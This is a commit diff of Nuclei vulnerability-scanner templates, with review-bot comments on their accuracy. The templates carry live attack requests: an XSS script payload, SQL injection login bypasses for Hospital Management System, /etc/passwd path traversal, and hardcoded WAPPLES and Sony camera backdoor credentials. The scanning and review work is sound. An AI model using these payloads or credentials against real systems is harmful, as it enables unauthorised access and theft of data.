Projects STRLCPY scan4all Commits d18fc72b
    config/nuclei-templates/cves/2022/CVE-2022-0678.yaml
     1 +id: CVE-2022-0678
     2 + 
     3 +info:
     4 + name: Microweber < 1.2.11- Cross-Site Scripting
     5 + author: tess
     6 + severity: medium
     7 + description: |
     8 + Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
     9 + reference:
     10 + - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
     11 + - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
     13 + - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 6.1
     17 + cve-id: CVE-2022-0678
     18 + cwe-id: CWE-79
     19 + metadata:
     20 + shodan-query: http.favicon.hash:780351152
     21 + verified: "true"
     22 + tags: huntr,cve,cve2022,xss,microweber
     23 + 
     24 +requests:
     25 + - method: GET
     26 + path:
     27 + - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
     28 + 
     29 + matchers-condition: and
     30 + matchers:
     31 + - type: word
     32 + part: body
     33 + words:
     34 + - '><script>alert(document.domain)</script>'
     35 + - 'content="Microweber"'
     36 + condition: and
     37 + 
     38 + - type: word
     39 + part: header
     40 + words:
     41 + - text/html
     42 + 
     43 + - type: status
     44 + status:
     45 + - 404
     46 + 
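Review bot: the description at line 8 reads "the user doesn't escape the double-quote in the $redirectUrl parameter", which makes it sound like the attacker is expected to escape it; it is the application that fails to escape `"` in `$redirectUrl` on logout, so reword to "the application does not escape the double quote". Lines 10 and 13 also cite the same huntr bounty twice (once with a trailing slash), and the Twitter link at line 11 carries `?s=20&t=...` tracking parameters; keep one huntr entry and strip the query string.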
    config/nuclei-templates/cves/2022/CVE-2022-29775.yaml
     1 +id: CVE-2022-29775
     2 + 
     3 +info:
     4 + name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
     5 + author: arafatansari
     6 + severity: critical
     7 + description: |
     8 + iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
     9 + reference:
     10 + - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
     11 + - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29775
     13 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2022-29775
     18 + cwe-id: CWE-287
     19 + metadata:
     20 + shodan-query: http.html:"iSpy is running"
     21 + verified: "true"
     22 + tags: cve,cve2022,ispy,auth-bypass
     23 + 
     24 +requests:
     25 + - method: GET
     26 + path:
     27 + - '{{BaseURL}}/logfile?d=crossdomain.xml'
     28 + 
     29 + matchers-condition: and
     30 + matchers:
     31 + - type: word
     32 + part: body
     33 + words:
     34 + - 'Log Start'
     35 + - 'Log File'
     36 + - 'iSpy'
     37 + condition: and
     38 + 
     39 + - type: word
     40 + part: header
     41 + words:
     42 + - text/html
     43 + 
     44 + - type: status
     45 + status:
     46 + - 200
     47 + 
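Review bot: the MITRE reference at line 13 is malformed: `cvename.cgi?name=2022-29775` drops the `CVE-` prefix, so the link does not resolve to the record; it should be `name=CVE-2022-29775`. Otherwise the check is reasonable, but note that `Log Start`, `Log File` and `iSpy` only prove the log file is readable without credentials; the description could say that plainly ("the log file is served without authentication") so operators know what a hit means.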
    config/nuclei-templates/cves/2022/CVE-2022-32094.yaml
     1 +id: CVE-2022-32094
     2 + 
     3 +info:
     4 + name: Hospital Management System v1.0 - SQL Injection
     5 + author: arafatansari
     6 + severity: critical
     7 + description: |
     8 + Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/doctor.php.
     9 + reference:
     10 + - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32094
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     14 + cvss-score: 9.8
     15 + cve-id: CVE-2022-32094
     16 + cwe-id: CWE-89
     17 + metadata:
     18 + shodan-query: http.html:"Hospital Management System"
     19 + verified: "true"
     20 + tags: cve,cve2022,hms,cms,sqli,auth-bypass
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /hms/doctor/ HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
     30 + 
     31 + redirects: true
     32 + max-redirects: 2
     33 + cookie-reuse: true
     34 + matchers-condition: and
     35 + matchers:
     36 + - type: word
     37 + part: body
     38 + words:
     39 + - '<title>Doctor | Dashboard</title>'
     40 + - 'View Appointment History'
     41 + condition: and
     42 + 
     43 + - type: status
     44 + status:
     45 + - 200
     46 + 
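Review bot: the description (line 8) names the `editid` parameter of `/HMS/doctor.php` as the injection point, but the request (lines 25-29) exercises a login bypass on `/hms/doctor/` via `username`/`password`. Either the description should describe what is actually tested, or the request should target `editid`; as written a reader cannot tell which sink CVE-2022-32094 covers, and the `auth-bypass` tag is only justified for the login form.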
    config/nuclei-templates/cves/2022/CVE-2022-34590.yaml
     1 +id: CVE-2022-34590
     2 + 
     3 +info:
     4 + name: Hospital Management System v1.0 - SQL Injection
     5 + author: arafatansari
     6 + severity: high
     7 + description: |
     8 + Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.
     9 + reference:
     10 + - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34590
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     14 + cvss-score: 7.2
     15 + cve-id: CVE-2022-34590
     16 + cwe-id: CWE-89
     17 + metadata:
     18 + shodan-query: http.html:"Hospital Management System"
     19 + verified: "true"
     20 + tags: cve,cve2022,hms,cms,sqli
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /hms/admin/ HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
     30 + 
     31 + redirects: true
     32 + max-redirects: 2
     33 + cookie-reuse: true
     34 + matchers-condition: and
     35 + matchers:
     36 + - type: word
     37 + part: body
     38 + words:
     39 + - '<title>Admin | Dashboard</title>'
     40 + - 'Manage Patients'
     41 + - 'Manage Doctors'
     42 + condition: and
     43 + 
     44 + - type: status
     45 + status:
     46 + - 200
     47 + 
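Review bot: same mismatch as CVE-2022-32094: the description (line 8) cites `editid` in `/HMS/admin.php`, while the request (lines 25-29) is a login bypass against `/hms/admin/`. Here it also contradicts the classification: `PR:H` at line 13 says high privileges are required, yet the template succeeds with no credentials, so either the vector or the request is wrong. The body at line 29 is byte-identical to the one in CVE-2022-32094 and CVE-2022-38637; if these are one login-form injection across three entry points, a single template with a path payload list would be easier to keep in sync than three copies.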
    config/nuclei-templates/cves/2022/CVE-2022-35405.yaml
    1 1  id: CVE-2022-35405
    2 2   
    3 3  info:
    4  - name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
    5  - author: true13
     4 + name: Zoho ManageEngine Password Manager Pro and PAM 360 - Unauthenticated Remote Command Execution
     5 + author: viniciuspereiras,true13
    6 6   severity: critical
    7 7   description: |
    8  - This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
     8 + This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro, PAM360 and Access Manager Plus (Authenticated).
    9 9   reference:
    10 10   - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
    11 11   - https://xz.aliyun.com/t/11578
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2022-35405
    13 13   - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
     14 + - https://www.bigous.me/2022/09/06/CVE-2022-35405.html
    14 15   classification:
    15 16   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    16 17   cvss-score: 9.8
    17 18   cve-id: CVE-2022-35405
    18 19   metadata:
    19  - shodan-query: http.title:"ManageEngine Password"
     20 + shodan-query: http.title:"ManageEngine"
    20 21   tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
    21 22   
    22 23  requests:
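Review bot: the new description at line 8 adds Access Manager Plus as "(Authenticated)", but the name at line 4 still says "Unauthenticated" and the tags at line 21 still carry `unauth`; either drop that product from the description or qualify the name and tags. The `shodan-query` change at line 20 from `http.title:"ManageEngine Password"` to `http.title:"ManageEngine"` now matches every ManageEngine product; if the intent is to add PAM360, an OR query listing the two titles keeps the scope honest.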
    skipped 1 lines
    24 25   - |
    25 26   POST /xmlrpc HTTP/1.1
    26 27   Host: {{Hostname}}
    27  - Content-Type: text/xml
    28 28   
    29  - <?xml version="1.0"?>
    30  - <methodCall>
    31  - <methodName>ProjectDiscovery</methodName>
    32  - <params>
    33  - <param>
    34  - <value>
    35  - <struct>
    36  - <member>
    37  - <name>test</name>
    38  - <value>
    39  - <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
    40  - </value>
    41  - </member>
    42  - </struct>
    43  - </value>
    44  - </param>
    45  - </params>
    46  - </methodCall>
     29 + <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
    47 30   
    48  - matchers-condition: and
     31 + - |
     32 + POST /xmlrpc HTTP/1.1
     33 + Host: {{Host}}:7272
     34 + 
     35 + <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
     36 + - |
     37 + POST /xmlrpc HTTP/1.1
     38 + Host: {{Host}}:8282
     39 + 
     40 + <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
     41 + - |
     42 + POST /xmlrpc HTTP/1.1
     43 + Host: {{Host}}:9292
     44 + 
     45 + <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
     46 + 
    49 47   matchers:
    50 48   - type: word
    51 49   part: body
    52 50   words:
    53  - - "Failed to read result object: null"
    54  - 
    55  - - type: word
    56  - part: header
    57  - words:
    58  - - text/xml
     51 + - "faultString"
     52 + - "No such service [ProjectDiscovery]"
     53 + - "methodResponse"
     54 + condition: or
    59 55   
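Review bot: the replacement matcher (lines 51-54) uses `condition: or` over `faultString`, `No such service [ProjectDiscovery]` and `methodResponse`, which any XML-RPC endpoint returns when asked for a bogus method, so the template now detects "XML-RPC is reachable" rather than "the vulnerable deserialization path is reachable". The removed request (lines 29-46) sent a `<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">` member and matched the specific `Failed to read result object: null` reply, which is what distinguished the Apache XML-RPC extensions path; keep that request and matcher (or add them back as a required second matcher under `matchers-condition: and`, which this hunk also deleted at line 48). Line 27 additionally dropped `Content-Type: text/xml`; restore it so the body is unambiguously sent as XML.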
    config/nuclei-templates/cves/2022/CVE-2022-35413.yaml
     1 +id: CVE-2022-35413
     2 + 
     3 +info:
     4 + name: Wapples Web Application Firewall - Hardcoded credentials
     5 + author: For3stCo1d
     6 + severity: critical
     7 + description: |
     8 + WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001.
     9 + reference:
     10 + - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
     11 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
     12 + - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
     13 + metadata:
     14 + shodan-query: http.title:"Intelligent WAPPLES"
     15 + verified: "true"
     16 + tags: cve,cve2022,wapples,firewall,default-login
     17 + 
     18 +requests:
     19 + - raw:
     20 + - |
     21 + POST /webapi/auth HTTP/1.1
     22 + Host: {{Hostname}}
     23 + Content-Type: application/x-www-form-urlencoded
     24 + 
     25 + id={{username}}&password={{password}}
     26 + 
     27 + attack: pitchfork
     28 + payloads:
     29 + username:
     30 + - systemi
     31 + password:
     32 + - db/wp.no1
     33 + 
     34 + matchers-condition: and
     35 + matchers:
     36 + - type: word
     37 + part: body
     38 + words:
     39 + - '"res_msg":"Authentication Success."'
     40 + - '"doc_id":"user_systemi"'
     41 + condition: and
     42 + 
     43 + - type: word
     44 + part: header
     45 + words:
     46 + - WP_SESSID=
     47 + 
     48 + - type: status
     49 + status:
     50 + - 200
     51 + 
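Review bot: `classification:` is missing (the `info` block jumps from `reference` at lines 9-12 to `metadata` at line 13) even though this is a CVE template; add `cve-id: CVE-2022-35413` and `cwe-id: CWE-798` (hard-coded credentials) so it is indexed like the other CVE templates in this commit. The description at line 8 says the API listens on port 443 or 5001, but the request only hits `{{BaseURL}}`; a second raw request with `Host: {{Host}}:5001`, as the CVE-2022-35405 template does for its extra ports, would cover the second listener. `attack: pitchfork` with one value per list (lines 27-32) is harmless but unnecessary; the two literals could be inlined.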
    config/nuclei-templates/cves/2022/CVE-2022-38637.yaml
     1 +id: CVE-2022-38637
     2 + 
     3 +info:
     4 + name: Hospital Management System v1.0 - SQL Injection
     5 + author: arafatansari
     6 + severity: high
     7 + description: |
     8 + Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php.
     9 + reference:
     10 + - https://www.youtube.com/watch?v=m8nW0p69UHU
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-38637
     12 + - https://owasp.org/www-community/attacks/SQL_Injection
     13 + classification:
     14 + cve-id: CVE-2022-38637
     15 + metadata:
     16 + shodan-query: http.html:"Hospital Management System"
     17 + verified: "true"
     18 + tags: cve,cve2022,hms,cms,sqli,auth-bypass
     19 + 
     20 +requests:
     21 + - raw:
     22 + - |
     23 + POST /hms/user-login.php HTTP/1.1
     24 + Host: {{Hostname}}
     25 + Content-Type: application/x-www-form-urlencoded
     26 + 
     27 + username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
     28 + 
     29 + redirects: true
     30 + max-redirects: 2
     31 + cookie-reuse: true
     32 + matchers-condition: and
     33 + matchers:
     34 + - type: word
     35 + part: body
     36 + words:
     37 + - '<title>User | Dashboard</title>'
     38 + - 'Book My Appointment'
     39 + condition: and
     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
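Review bot: the description at line 8 again names `editid` while the request (lines 23-27) is a login bypass on `/hms/user-login.php`; make the description match the request. This template also lacks the `cvss-metrics`/`cvss-score` that the sibling HMS templates carry (classification at lines 13-14 has only `cve-id`), and its references (lines 10, 12) are a YouTube video and the generic OWASP SQL injection page rather than a write-up for this CVE.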
    config/nuclei-templates/cves/2022/CVE-2022-40734.yaml
     1 +id: CVE-2022-40734
     2 + 
     3 +info:
     4 + name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
     5 + author: arafatansari
     6 + severity: high
     7 + description: |
     8 + UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
     9 + reference:
     10 + - https://github.com/UniSharp/laravel-filemanager/issues/1150
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
     12 + classification:
     13 + cve-id: CVE-2022-40734
     14 + metadata:
     15 + verified: true
     16 + shodan-query: http.html:"Laravel Filemanager"
     17 + tags: cve,cve2022,laravel,unisharp,lfi,traversal
     18 + 
     19 +requests:
     20 + - method: GET
     21 + path:
     22 + - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
     23 + - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
     24 + 
     25 + stop-at-first-match: true
     26 + matchers:
     27 + - type: regex
     28 + regex:
     29 + - "root:[x*]:0:0"
     30 + 
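Review bot: classification (lines 12-13) carries only `cve-id`; add `cwe-id: CWE-22` for the traversal and the CVSS vector if one is published. `verified: true` at line 15 is an unquoted boolean while the other CVE templates in this commit write `verified: "true"`; pick one form for the whole commit. The request itself is fine: the two paths (lines 22-23) match the `download?working_dir=%2F..` form quoted in the description, and `root:[x*]:0:0` is specific enough to stand without a status matcher.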
    config/nuclei-templates/exposed-panels/footprints-panel.yaml
     1 +id: footprints-panel
     2 + 
     3 +info:
     4 + name: footprints panel
     5 + author: tess
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: title:"FootPrints Service Core Login"
     10 + tags: tech,panel,footprints
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}/MRcgi/MRlogin.pl'
     16 + - '{{BaseURL}}/MRcgi/MRentrancePage.pl'
     17 + 
     18 + stop-at-first-match: true
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + part: body
     24 + words:
     25 + - 'FootPrints Service Core Login'
     26 + 
     27 + - type: status
     28 + status:
     29 + - 200
     30 + 
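Review bot: `name: footprints panel` (line 4) is lowercase and does not name the product; the page the matcher looks for is `FootPrints Service Core Login` (line 25), so `name: FootPrints Service Core Login Panel` follows the convention of the other panel templates. `shodan-query` at line 9 uses `title:` while every other template in this commit uses `http.title:`; keep them consistent.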
    config/nuclei-templates/exposed-panels/hospital-management-panel.yaml
     1 +id: hospital-management-panel
     2 + 
     3 +info:
     4 + name: Hospital Management System Panel
     5 + author: arafatansari
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.html:"Hospital Management System"
     10 + tags: panel,hms,cms
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/index.html"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - 'Hospital Management System'
     23 + - 'Doctors Login'
     24 + - 'Admin Login'
     25 + condition: and
     26 + 
     27 + - type: status
     28 + status:
     29 + - 200
     30 + 
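Review bot: the panel check requests `{{BaseURL}}/index.html` (line 15), whereas the three HMS CVE templates and the two HMS XSS templates post to `/hms/...`; a deployment where HMS lives under `/hms/` (the layout the exploit templates assume) is not detected here, and one detected here is not where the exploits look. Add `{{BaseURL}}/hms/index.html` as a second path with `stop-at-first-match: true`, and consider adding the `hospital` tag the XSS templates use so the set can be selected together.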
    config/nuclei-templates/exposures/configs/firebase-config-exposure.yaml
    skipped 10 lines
    11 11  requests:
    12 12   - method: GET
    13 13   path:
     14 + - "{{BaseURL}}"
    14 15   - "{{BaseURL}}/public/config.js"
    15 16   - "{{BaseURL}}/config.js"
    16 17   
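Review bot: adding a bare `{{BaseURL}}` (line 14) sends one extra request per target whose body is an arbitrary landing page; the matchers are outside this hunk ("skipped 15 lines"), so please confirm they require several Firebase config keys together (`apiKey`, `authDomain`, `projectId`) rather than a lone `firebase` string, otherwise any page that merely loads the Firebase SDK will be reported as a config exposure.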
    skipped 15 lines
    config/nuclei-templates/exposures/configs/redis-config.yaml
     1 +id: redis-config
     2 + 
     3 +info:
     4 + name: Redis Configuration File Exposure
     5 + author: geeknik
     6 + severity: medium
     7 + reference: https://redis.io/docs/manual/config/
     8 + metadata:
     9 + verified: true
     10 + shodan-query: html:"redis.conf"
     11 + tags: redis,exposure,config
     12 + 
     13 +requests:
     14 + - method: GET
     15 + path:
     16 + - "{{BaseURL}}/redis.conf"
     17 + 
     18 + matchers-condition: and
     19 + matchers:
     20 + - type: word
     21 + part: body
     22 + words:
     23 + - "bind"
     24 + - "protected-mode"
     25 + - "port "
     26 + condition: and
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - "application/octet-stream"
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
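Review bot: the header matcher at lines 28-31 requires `application/octet-stream`, but a `redis.conf` served by a web server is at least as likely to come back as `text/plain` or whatever the server's default for an unknown extension is, so with `matchers-condition: and` real exposures are silently missed. Drop the header matcher or use `condition: or` over `application/octet-stream` and `text/plain`; the three body words plus status 200 already carry the signal. `bind` and `port ` are also very short words; `daemonize`, `dir ` or `requirepass` would make the body match less likely to hit an unrelated file.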
    config/nuclei-templates/exposures/configs/tox-ini.yaml
     1 +id: tox-ini
     2 + 
     3 +info:
     4 + name: tox.ini File Exposure
     5 + author: geeknik
     6 + severity: low
     7 + reference: https://tox.wiki/en/latest/config.html
     8 + metadata:
     9 + verified: true
     10 + shodan-query: html:"tox.ini"
     11 + tags: exposure,config,tox
     12 + 
     13 +requests:
     14 + - method: GET
     15 + path:
     16 + - "{{BaseURL}}/tox.ini"
     17 + 
     18 + matchers-condition: and
     19 + matchers:
     20 + - type: word
     21 + part: body
     22 + words:
     23 + - "[tox]"
     24 + - "[testenv]"
     25 + condition: and
     26 + 
     27 + - type: word
     28 + part: header
     29 + words:
     30 + - "application/octet-stream"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
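Review bot: same issue as redis-config: requiring `application/octet-stream` (lines 27-30) discards `tox.ini` files served as `text/plain`; relax or remove the header matcher, since `[tox]` together with `[testenv]` is already specific.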
    config/nuclei-templates/exposures/configs/ventrilo-config.yaml
     1 +id: ventrilo-config
     2 + 
     3 +info:
     4 + name: Ventrilo Configuration File
     5 + author: geeknik
     6 + severity: high
     7 + description: |
     8 + It discloses the AdminPassword and Password of the application.
     9 + reference:
     10 + - https://www.ventrilo.com/setup.php
     11 + metadata:
     12 + verified: true
     13 + tags: ventrilo,config,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/ventrilo_srv.ini"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - "[Server]"
     25 + - "Name"
     26 + - "Phonetic"
     27 + condition: and
     28 + 
     29 + - type: word
     30 + part: header
     31 + words:
     32 + - "text/plain"
     33 + 
     34 + - type: status
     35 + status:
     36 + - 200
     37 + 
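Review bot: the body matcher (lines 22-27) omits `part: body` (the default, so it works, but every other template in this commit sets it explicitly) and matches `Name`, which appears in almost any text. Since the description at line 8 says the value of this file is the `AdminPassword` and `Password` keys, matching on those two strings plus `[Server]` both sharpens detection and proves the sensitive content is actually present. The description should also read "This file discloses the AdminPassword and Password values of the Ventrilo server" rather than "It discloses ...".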
    config/nuclei-templates/exposures/files/vscode-sftp.yaml
     1 +id: vscode-sftp
     2 + 
     3 +info:
     4 + name: VSCode SFTP File Exposure
     5 + author: geeknik
     6 + severity: high
     7 + description: |
     8 + It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials.
     9 + metadata:
     10 + verified: true
     11 + shodan-query: html:"sftp.json"
     12 + tags: exposure,vscode,sftp,ssh
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}/sftp.json"
     18 + - "{{BaseURL}}/.config/sftp.json"
     19 + - "{{BaseURL}}/.vscode/sftp.json"
     20 + 
     21 + stop-at-first-match: true
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: word
     25 + part: body
     26 + words:
     27 + - '"name":'
     28 + - '"host":'
     29 + - '"protocol":'
     30 + condition: and
     31 + 
     32 + - type: word
     33 + part: header
     34 + words:
     35 + - "application/json"
     36 + 
     37 + - type: status
     38 + status:
     39 + - 200
     40 + 
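Review bot: `"name":`, `"host":` and `"protocol":` (lines 27-29) are generic JSON keys and any server description in JSON will match. The description at line 8 says the file holds SFTP/SSH credentials, so additionally require `"username":` and one of `"password":` or `"privateKeyPath":` (the credential keys the vscode-sftp config uses); that also justifies `severity: high`. Line 8 should read "Discloses the sftp.json file created by the vscode-sftp extension for VS Code, which contains SFTP/SSH server details and credentials."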
    config/nuclei-templates/exposures/tokens/discord/discord-backup-code.yaml
     1 +id: discord-backup-code
     2 + 
     3 +info:
     4 + name: Discord Backup Code Detection
     5 + author: geeknik
     6 + severity: high
     7 + tags: exposure,token,discord
     8 + 
     9 +requests:
     10 + - method: GET
     11 + path:
     12 + - '{{BaseURL}}/discord-backup-codes.txt'
     13 + - '{{BaseURL}}/discord_backup_codes.txt'
     14 + 
     15 + stop-at-first-match: true
     16 + matchers-condition: and
     17 + matchers:
     18 + - type: regex
     19 + part: body
     20 + regex:
     21 + - '[0-9A-Za-z]{4}\-[0-9A-Za-z]{4}'
     22 + 
     23 + - type: status
     24 + status:
     25 + - 200
     26 + 
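Review bot: `[0-9A-Za-z]{4}\-[0-9A-Za-z]{4}` (line 21) matches any `xxxx-xxxx` token, including dates, UUID fragments and version strings, so the only real signal in this template is the filename; with `severity: high` that is a weak basis. At minimum anchor the pattern to a whole line (`(?m)^[0-9A-Za-z]{4}-[0-9A-Za-z]{4}$`) and add a `negative: true` word matcher for `<html` so catch-all 200 pages are discarded. The GitHub template below carries `metadata: verified: true`; add it here only if this one was tested against a real file.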
    config/nuclei-templates/exposures/tokens/github/github-recovery-code.yaml
     1 +id: github-recovery-code
     2 + 
     3 +info:
     4 + name: Github Recovery Code Detection
     5 + author: geeknik
     6 + severity: high
     7 + metadata:
     8 + verified: true
     9 + tags: exposure,token,github
     10 + 
     11 +requests:
     12 + - method: GET
     13 + path:
     14 + - '{{BaseURL}}/github-recovery-codes.txt'
     15 + - '{{BaseURL}}/github_recovery_codes.txt'
     16 + 
     17 + stop-at-first-match: true
     18 + matchers-condition: and
     19 + matchers:
     20 + - type: regex
     21 + part: body
     22 + regex:
     23 + - '[0-9A-Za-z]{5}\-[0-9A-Za-z]{5}'
     24 + 
     25 + - type: status
     26 + status:
     27 + - 200
     28 + 
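Review bot: same weakness as the Discord template: `[0-9A-Za-z]{5}\-[0-9A-Za-z]{5}` (line 23) matches any `xxxxx-xxxxx` slug in an error page or SPA shell served at that path. Anchor it per line with `(?m)^...$` and add a `negative: true` matcher for `<html` so 200-OK catch-all responses do not count.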
    config/nuclei-templates/exposures/tokens/gitlab/gitlab-recovery-code.yaml
     1 +id: gitlab-recovery-code
     2 + 
     3 +info:
     4 + name: Gitlab Recovery Code Detection
     5 + author: geeknik
     6 + severity: high
     7 + tags: exposure,token,gitlab
     8 + 
     9 +requests:
     10 + - method: GET
     11 + path:
     12 + - '{{BaseURL}}/gitlab-recovery-codes.txt'
     13 + - '{{BaseURL}}/gitlab_recovery_codes.txt'
     14 + 
     15 + stop-at-first-match: true
     16 + matchers-condition: and
     17 + matchers:
     18 + - type: regex
     19 + part: body
     20 + regex:
     21 + - '[0-9A-Za-z]{16}'
     22 + 
     23 + - type: status
     24 + status:
     25 + - 200
     26 + 
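Review bot: `[0-9A-Za-z]{16}` (line 21) with no anchors matches any run of 16 alphanumerics, which virtually every HTML page contains (a nonce, a hash fragment, a long word); combined with `status: 200` this will report every host that serves a catch-all page for unknown `.txt` paths. Require the whole line to be the code (`(?m)^[0-9A-Za-z]{16}$`) and add a `negative: true` word matcher for `<html`. Unlike the GitHub template, this one also lacks `metadata: verified:`.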
    config/nuclei-templates/iot/sony-camera-backdoor.yaml
     1 +id: sony-camera-backdoor
     2 + 
     3 +info:
     4 + name: Backdoor In Sony IPELA Engine IP Cameras
     5 + author: af001
     6 + severity: high
     7 + description: |
     8 + Multiple SONY network cameras vulnerable to sensitive information disclosure via hardcoded credentials and a backdoor.
     9 + reference:
     10 + - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/
     11 + - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/
     12 + - https://jvn.jp/en/vu/JVNVU96435227/index.html
     13 + - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras
     14 + remediation: |
     15 + Upgrade to the latest version of the firmware provided by Sony.
     16 + classification:
     17 + cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     18 + cvss-score: 8.8
     19 + cve-id: CVE-2016-7834
     20 + cwe-id: CWE-200
     21 + tags: sony,backdoor,unauth,telnet,iot,camera
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - "{{BaseURL}}/command/prima-factory.cgi"
     27 + 
     28 + headers:
     29 + Authorization: Bearer cHJpbWFuYTpwcmltYW5h
     30 + 
     31 + matchers-condition: and
     32 + matchers:
     33 + - type: word
     34 + part: header
     35 + words:
     36 + - 'gen5th'
     37 + - 'gen6th'
     38 + condition: or
     39 + 
     40 + - type: status
     41 + status:
     42 + - 204
     43 + 
